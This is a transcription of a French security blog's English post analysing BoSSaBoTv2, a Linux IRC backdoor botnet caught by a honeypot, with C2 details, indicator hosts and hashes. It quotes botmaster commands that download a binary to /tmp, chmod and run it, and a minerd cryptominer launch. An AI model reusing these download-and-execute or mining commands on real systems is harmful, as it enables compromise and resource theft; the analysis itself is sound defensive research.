BoSSaBoTv2 : another Linux Backdoor IRC malekal's site

Transcription

1 Projet antimalwares Comparatif Antivirus Soutenir Malekal.com Forum Me contacter malekal's site site entraide informatique Rechercher... Rechercher Articles/Papiers Projet antimalwares Comparatif Antivirus Soutenir Malekal.com Forum Me contacter Flux RSS Global Internet Backbone he.net/ip_transit/ IPv6+IPv4 Transit For Your Network New Special 10 Gbps $4000/month Menu Accueil News Malwares / Informatique / Internet [en] BoSSaBoTv2 : another Linux Backdoor IRC Par 1 of 14 09/13/ :07 PM

2 Publicité?> GNU/Linux Basique Général Réseau Windows General Malwares Sécurité Windows Tutoriaux Logiciels News du site / Vrac 12 Share 2 Tweet 41 Share 2 Share 70 Today, i was looking at my web honeypot and this one pay my attention : The PHP vulnerability is very used (already wrote something about it : ) but it was the first time i saw thoses base64decode code. The code lead to haxmeup.uni.me ( OVH) that redirect to I expect to get a PHP-Shellbot as usual, but this time, it was a FUD binary : /bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9/anal / / so i launch it : Rejoignez-nous sur Facebook 2 of 14 09/13/ :07 PM

3 Top menaces Pos. 1. PUPs 2. Adware 3. Trojan 4. Worm Menaces MySearchDial - Trovi - istart.webssearches.com - istartsurf Sweet Page - System SpeedUp - Mega Browser - ViewPassword - Ads by Keep now Antivirus Security Pro - ZeroAccess / Sirefef Virus USB Raccourcis Plus de procédures de désinfection Partenaires Autoblog Malekal botnets.fr geekden Le blog de Chantal11 Liste Malwares malekal.com PjJoint Malekal.com S!RI Blog made a connection to (OVH again) port 8067, there is an ircd behind nmap -sv p 8067 Starting Nmap 6.00 ( ) at :47 CEST Nmap scan report for Host is up (0.027s latency). PORT STATE SERVICE VERSION 8067/tcp open irc Unreal ircd Service Info: Host: irc.wix.wix Service detection performed. Please report any incorrect results at 3 of 14 09/13/ :07 PM

4 BoSSaBoTv2 : another Linux Backdoor IRC malekal's site This website uses cookies OKAY Tigzy Roguekiller Xylibox Blog MORE INFO so an IRC Backdoor. Publicités Network Bandwidth Monitor solarwinds.com... See Which Users, Apps & Protocols Are Consuming Bandwidth- Learn More Google Chromecast for $35 google.com/chr... Enjoy online video & anything from the web on your TV. buy now! Another surprise, the ircd doesnt have any mod to hide users etc. ~40 bots, not so much. So let s play. Mots clefs adware adwares Antispywares Antivir antivirus Avast! backdoor botnet CD Live désinfection Eorezo 4 of 14 exploit Firefox on the screenshot bellow, we can that the bostmaster launch a range IP scan, then some bots Exploit some servers. We can see that the exploit at was successfull because it joins the channel as a new bot. 09/13/ :07 PM

5 BoSSaBoTv2 : another Linux Backdoor IRC malekal's site This website uses cookies OKAY MORE INFO Malwares PUP ransomware rogues rootkit réseau scareware spam rogue spyware spywares Stealer TDSS trojan trojans tutorial vers virus Trojan.Winlock Windows worms Tuto4PC zbot ZeroAccess confrimed by my VM. We got an other DNS con32.cz.cc that give the same IP Publicités Two new bots : 5 of 14 09/13/ :07 PM

6 BoSSaBoTv2 : another Linux Backdoor IRC malekal's site This website uses cookies OKAY MORE INFO You need Flash player 8+ and JavaScript enabled to view this video. Publicités The IRCd is new around ~40 bots in 9 days : The botmaster made regularly download new binary all from (seems legitim)!boss*!boss*!boss*!boss* SH SH SH SH wget -P /tmp mv /tmp/05fbc jpg /tmp/4l2njg5vab chmod 777 /tmp/4l2njg5vab /tmp/4l2njg5vab Some Hashs and Hosts recap : haxmeup.uni.me / con32.cz.cc / con64.cz.cc ( OVH) haxmedown.cz.cc of 14 09/13/ :07 PM

7 then i wrote a little script to send the abuse, hope, they will lose some bots MalwareMustDie decompile the binary, some strings : /files.php?read= _n7h14d5w5i6 Thanks to them. Bitcoin capabilities : BC C C60 /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null & pkill minerd ; pkill m32 ; pkill m64 wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x8 7 of 14 09/13/ :07 PM

8 The most interresting : E1D BoSSaBoTv2-%s a search at Google this topic on /showthread.php?tid= According the date post, the kit is new and the price is at 100$ 8 of 14 09/13/ :07 PM

9 BoSSaBoTv2 : another Linux Backdoor IRC malekal's site This website uses cookies 9 of 14 OKAY MORE INFO 09/13/ :07 PM

10 Back, lot of attacks this WE : Binaries are undetected /index.php?hash= be4ad21259bcb9b17e9bd3 /index.php?hash=36263d91d726dcdb93b97ea05ae8656a IRCd : port of 14 09/13/ :07 PM

11 40 2 You may also like: 11 of 14 09/13/ :07 PM

12 Trojan.Chepvil et Trojan.Sasfis / Trojan.Cridex : les campagnes de Spam malicieux continuent SPAM/Virus Facebook : gagner un iphone 4S color SpamHaus ransomwa Win32/Stration.worm. Worm.Win32.Warezov Tutorial Dial-a-fix Supprimer Adware.Zango Supprimer / - 12 Share 2 Tweet 41 Share 2 Share of 14 09/13/ :07 PM

13 2 Comments myturbopc.com Remove all Malware in 2 mins. #1 Download for Rated 5/5! sneezing_panda Posté le 8 septembre 2014 à 4:28 He s an idiot. People are already compl on the HF thread. CyD Posté le 8 septembre 2014 à 10:52 Using botnets of zombie computers to spread malicious code through vulnerabilities in order to perform cyber-based attacks like denial-of-service i big mistake. Please, report this kind of cybercrime activities to federal law enforcement. Keep up the good work. Laisser un commentaire Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont ind avec * Nom * * 13 of 14 09/13/ :07 PM

14 sert à rien d'exposer vos problèmes ici, allez sur le forum pour obtenir de l'aide : Commentaire Vous pouvez utiliser ces balises et attributs HTML : <a href="" title=""> <abbr title=" <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite= <strike> <strong> Laisser un commentaire Plan du site À propos du thème Arras Ce site est hébergé par la société OVH 14 of 14 09/13/ :07 PM